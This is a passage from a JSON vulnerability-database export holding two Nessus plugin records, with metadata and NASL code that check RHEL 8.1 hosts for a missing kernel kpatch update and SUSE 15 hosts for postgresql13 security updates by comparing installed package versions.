advisory.\n\n - kernel: Local buffer overflow in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c\n (CVE-2020-25211)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 1, "cvss3": {"score": 6.0, "vector": "AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H"}, "published": "2021-01-21T00:00:00", "title": "RHEL 8 : kpatch-patch (RHSA-2021:0189)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-25211"], "modified": "2021-01-21T00:00:00", "cpe": ["cpe:/o:redhat:rhel_eus:8.1", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_13_2", "cpe:/o:redhat:rhel_e4s:8.1::baseos", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_8_1", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_34_1", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_27_1", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_24_2", "cpe:/o:redhat:rhel_e4s:8.1", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_32_1", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_20_1", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:rhel_eus:8.1::baseos", "p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_5_1"], "id": "REDHAT-RHSA-2021-0189.NASL", "href": "https://www.tenable.com/plugins/nessus/145242", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0189. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145242);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2020-25211\");\n script_xref(name:\"RHSA\", value:\"2021:0189\");\n\n script_name(english:\"RHEL 8 : kpatch-patch (RHSA-2021:0189)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0189 advisory.\n\n - kernel: Local buffer overflow in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c\n (CVE-2020-25211)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/119.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-25211\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0189\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1877571\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25211\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_13_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_20_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_24_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_27_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_32_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_34_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_5_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kpatch-patch-4_18_0-147_8_1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\ninclude('ksplice.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.1')) audit(AUDIT_OS_NOT, 'Red Hat 8.1', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_e4s_8_1_baseos': [\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_baseos': [\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms',\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-baseos-eus-rpms',\n 'rhel-8-for-aarch64-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-rpms',\n 'rhel-8-for-s390x-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-source-rpms',\n 'rhel-8-for-s390x-baseos-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-eus-rpms',\n 'rhel-8-for-x86_64-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms__8_DOT_1'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0189');\n}\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n rm_kb_item(name:'Host/uptrack-uname-r');\n cve_list = make_list('CVE-2020-25211');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for RHSA-2021:0189');\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\npkgs = [\n {'rpm_prefix': 'kernel-4.18.0-147.13.2', 'reference':'kpatch-patch-4_18_0-147_13_2-1-6.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.20.1', 'reference':'kpatch-patch-4_18_0-147_20_1-1-5.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.24.2', 'reference':'kpatch-patch-4_18_0-147_24_2-1-3.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.27.1', 'reference':'kpatch-patch-4_18_0-147_27_1-1-3.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.32.1', 'reference':'kpatch-patch-4_18_0-147_32_1-1-1.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.34.1', 'reference':'kpatch-patch-4_18_0-147_34_1-1-1.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.5.1', 'reference':'kpatch-patch-4_18_0-147_5_1-1-10.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'rpm_prefix': 'kernel-4.18.0-147.8.1', 'reference':'kpatch-patch-4_18_0-147_8_1-1-8.el8_1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['rpm_prefix'])) rpm_prefix = package_array['rpm_prefix'];\n if (reference && release && rpm_prefix) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && (rpm_exists(release:release, rpm:rpm_prefix) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj))) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kernel / kpatch-patch-4_18_0-147_13_2 / kpatch-patch-4_18_0-147_20_1 / etc');\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-22T14:37:05", "description": "This update for postgresql, postgresql13 fixes the following issues :\n\nThis update ships postgresql13.\n\nUpgrade to version 13.1 :\n\nCVE-2020-25695, bsc#1178666: Block DECLARE CURSOR ... WITH HOLD and\nfiring of deferred triggers within index expressions and materialized\nview queries.\n\nCVE-2020-25694, bsc#1178667: a) Fix usage of complex connection-string\nparameters in pg_dump, pg_restore, clusterdb, reindexdb, and vacuumdb.\nb) When psql's \\connect command re-uses connection parameters, ensure\nthat all non-overridden parameters from a previous connection string\nare re-used.\n\nCVE-2020-25696, bsc#1178668: Prevent psql's \\gset command from\nmodifying specially-treated variables.\n\nFix recently-added timetz test case so it works when the USA is not\nobserving daylight savings time. (obsoletes postgresql-timetz.patch)\n\nhttps://www.postgresql.org/about/news/2111/\n\nhttps://www.postgresql.org/docs/13/release-13-1.html\n\nInitial packaging of PostgreSQL 13 :\n\nhttps://www.postgresql.org/about/news/2077/\n\nhttps://www.postgresql.org/docs/13/release-13.html\n\nbsc#1178961: %ghost the symlinks to pg_config and ecpg.\n\nChanges in postgresql wrapper package :\n\nBump major version to 13.\n\nWe also transfer PostgreSQL 9.4.26 to the new package layout in\nSLE12-SP2 and newer. Reflect this in the conflict with postgresql94.\n\nAlso conflict with PostgreSQL versions before 9.\n\nConflicting with older versions is not limited to SLE.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 1, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-21T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : postgresql, postgresql13 (SUSE-SU-2021:0175-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-25695", "CVE-2020-25694", "CVE-2020-25696"], "modified": "2021-01-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:postgresql13-pltcl", "p-cpe:/a:novell:suse_linux:libpq5-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-server-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-plperl-debuginfo", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:postgresql13-devel-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-pltcl-debuginfo", "p-cpe:/a:novell:suse_linux:libpq5", "p-cpe:/a:novell:suse_linux:postgresql13-plpython", "p-cpe:/a:novell:suse_linux:postgresql13-contrib-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-server", "p-cpe:/a:novell:suse_linux:postgresql13", "p-cpe:/a:novell:suse_linux:postgresql13-devel", "p-cpe:/a:novell:suse_linux:postgresql13-test", "p-cpe:/a:novell:suse_linux:postgresql13-server-devel", "p-cpe:/a:novell:suse_linux:libecpg6", "p-cpe:/a:novell:suse_linux:libecpg6-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-debugsource", "p-cpe:/a:novell:suse_linux:postgresql13-plpython-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-contrib", "p-cpe:/a:novell:suse_linux:postgresql13-plperl", "p-cpe:/a:novell:suse_linux:libpq5-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-server-devel-debuginfo", "p-cpe:/a:novell:suse_linux:postgresql13-debuginfo"], "id": "SUSE_SU-2021-0175-1.NASL", "href": "https://www.tenable.com/plugins/nessus/145239", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:0175-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145239);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/21\");\n\n script_cve_id(\"CVE-2020-25694\", \"CVE-2020-25695\", \"CVE-2020-25696\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : postgresql, postgresql13 (SUSE-SU-2021:0175-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for postgresql, postgresql13 fixes the following issues :\n\nThis update ships postgresql13.\n\nUpgrade to version 13.1 :\n\nCVE-2020-25695, bsc#1178666: Block DECLARE CURSOR ... WITH HOLD and\nfiring of deferred triggers within index expressions and materialized\nview queries.\n\nCVE-2020-25694, bsc#1178667: a) Fix usage of complex connection-string\nparameters in pg_dump, pg_restore, clusterdb, reindexdb, and vacuumdb.\nb) When psql's \\connect command re-uses connection parameters, ensure\nthat all non-overridden parameters from a previous connection string\nare re-used.\n\nCVE-2020-25696, bsc#1178668: Prevent psql's \\gset command from\nmodifying specially-treated variables.\n\nFix recently-added timetz test case so it works when the USA is not\nobserving daylight savings time. (obsoletes postgresql-timetz.patch)\n\nhttps://www.postgresql.org/about/news/2111/\n\nhttps://www.postgresql.org/docs/13/release-13-1.html\n\nInitial packaging of PostgreSQL 13 :\n\nhttps://www.postgresql.org/about/news/2077/\n\nhttps://www.postgresql.org/docs/13/release-13.html\n\nbsc#1178961: %ghost the symlinks to pg_config and ecpg.\n\nChanges in postgresql wrapper package :\n\nBump major version to 13.\n\nWe also transfer PostgreSQL 9.4.26 to the new package layout in\nSLE12-SP2 and newer. Reflect this in the conflict with postgresql94.\n\nAlso conflict with PostgreSQL versions before 9.\n\nConflicting with older versions is not limited to SLE.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178666\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178668\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178961\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.postgresql.org/about/news/2077/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.postgresql.org/about/news/2111/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.postgresql.org/docs/13/release-13-1.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.postgresql.org/docs/13/release-13.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-25694/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-25695/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-25696/\"\n );\n # https://www.suse.com/support/update/announcement/2021/suse-su-20210175-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b7248f14\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP2 :\n\nzypper in -t patch\nSUSE-SLE-Module-Server-Applications-15-SP2-2021-175=1\n\nSUSE Linux Enterprise Module for Packagehub Subpackages 15-SP2 :\n\nzypper in -t patch\nSUSE-SLE-Module-Packagehub-Subpackages-15-SP2-2021-175=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-175=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libecpg6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libecpg6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpq5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpq5-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpq5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-contrib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-plperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-plperl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-plpython\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-plpython-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-pltcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-pltcl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-server-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:postgresql13-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libpq5-32bit-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", cpu:\"x86_64\", reference:\"libpq5-32bit-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libecpg6-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libecpg6-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libpq5-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libpq5-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-contrib-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-contrib-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-debugsource-13.1-5.3.10\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-debugsource-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-devel-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-devel-debuginfo-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-plperl-13.1-5.3.15\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"postgresql13-plperl-debuginfo-13.1-5.3.15\")) 